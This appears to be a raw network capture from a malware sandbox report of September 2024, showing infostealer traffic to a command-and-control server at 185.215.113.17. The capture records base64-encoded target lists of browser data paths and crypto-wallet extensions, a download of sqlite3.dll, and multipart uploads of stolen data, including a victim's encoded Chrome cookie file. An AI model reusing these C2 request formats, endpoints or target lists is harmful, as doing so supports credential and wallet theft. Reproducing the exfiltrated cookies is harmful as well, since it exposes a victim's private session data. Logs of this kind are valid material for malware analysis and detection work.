                                                                          Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                          Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                          Sep 27, 2024 04:21:15.512056112 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                          Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                                                          Sep 27, 2024 04:21:15.513345003 CEST468OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBK
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 267
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a
                                                                          Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="message"plugins------CBKJJEHCBAKFBFHJKFBK--
                                                                          Sep 27, 2024 04:21:15.742940903 CEST1236INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:15 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Vary: Accept-Encoding
                                                                          Content-Length: 7116
                                                                          Keep-Alive: timeout=5, max=97
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                          Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                          Sep 27, 2024 04:21:15.742957115 CEST1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                          Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                          Sep 27, 2024 04:21:15.742969036 CEST1236INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                          Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                          Sep 27, 2024 04:21:15.743069887 CEST1236INData Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48
                                                                          Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
                                                                          Sep 27, 2024 04:21:15.743081093 CEST896INData Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58
                                                                          Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
                                                                          Sep 27, 2024 04:21:15.743091106 CEST960INData Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44
                                                                          Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
                                                                          Sep 27, 2024 04:21:15.830434084 CEST544INData Raw: 5a 57 52 69 61 6d 6c 76 61 58 42 6e 62 47 64 6a 59 6d 4e 74 62 6d 4a 77 5a 32 78 70 62 32 5a 38 4d 58 77 77 66 44 42 38 56 47 39 75 61 32 56 6c 63 47 56 79 49 46 64 68 62 47 78 6c 64 48 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c 71 5a 57
                                                                          Data Ascii: ZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5
                                                                          Sep 27, 2024 04:21:15.831739902 CEST469OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHC
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 268
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 2d 2d 0d 0a
                                                                          Data Ascii: ------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="message"fplugins------BKEBFHIJECFIDGDGCGHC--
                                                                          Sep 27, 2024 04:21:16.060045004 CEST335INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:15 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Vary: Accept-Encoding
                                                                          Content-Length: 108
                                                                          Keep-Alive: timeout=5, max=96
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                          Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                          Sep 27, 2024 04:21:16.085285902 CEST202OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDG
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 6567
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Sep 27, 2024 04:21:16.085330009 CEST6567OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 43 42 41 4b 4b 46 42 47 43 42 46 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31
                                                                          Data Ascii: ------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------DBKKFCBAKKFBGCBFHJDGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                          Sep 27, 2024 04:21:16.426794052 CEST202INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:16 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Content-Length: 0
                                                                          Keep-Alive: timeout=5, max=95
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Sep 27, 2024 04:21:16.762638092 CEST93OUTGET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1
                                                                          Host: 185.215.113.17
                                                                          Cache-Control: no-cache
                                                                          Sep 27, 2024 04:21:16.988400936 CEST1236INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:16 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                          ETag: "10e436-5e7ec6832a180"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 1106998
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                          Sep 27, 2024 04:21:16.988519907 CEST224INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                          Data Ascii: #N@B/81s:<R@B/92P @B
                                                                          Sep 27, 2024 04:21:16.988573074 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 27, 2024 04:21:18.507190943 CEST952OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 751
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                          Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------IIEBGIDAAFHIJJJJEGCG--
                                                                          Sep 27, 2024 04:21:18.813164949 CEST202INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:18 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Content-Length: 0
                                                                          Keep-Alive: timeout=5, max=93
                                                                          Connection: Keep-Alive
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Sep 27, 2024 04:21:19.188080072 CEST564OUTPOST /2fb6c2cc8dce150a.php HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHI
                                                                          Host: 185.215.113.17
                                                                          Content-Length: 363
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 32 37 63 31 30 64 64 38 65 34 39 31 66 38 38 34 30 61 62 63 61 65 65 66 35 61 30 31 38 65 35 62 36 34 39 62 64 64 33 62 62 33 65 66 33 63 30 64 37 33 64 39 32 33 31 31 32 66 37 62 64 32 35 32 32 33 63 61 64 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                          Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="token"4727c10dd8e491f8840abcaeef5a018e5b649bdd3bb3ef3c0d73d923112f7bd25223cad7------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="file"------KJKKJKEHDBGIDGDHCFHI--
                                                                          Sep 27, 2024 04:21:19.496686935 CEST202INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:19 GMT
                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                          Content-Length: 0
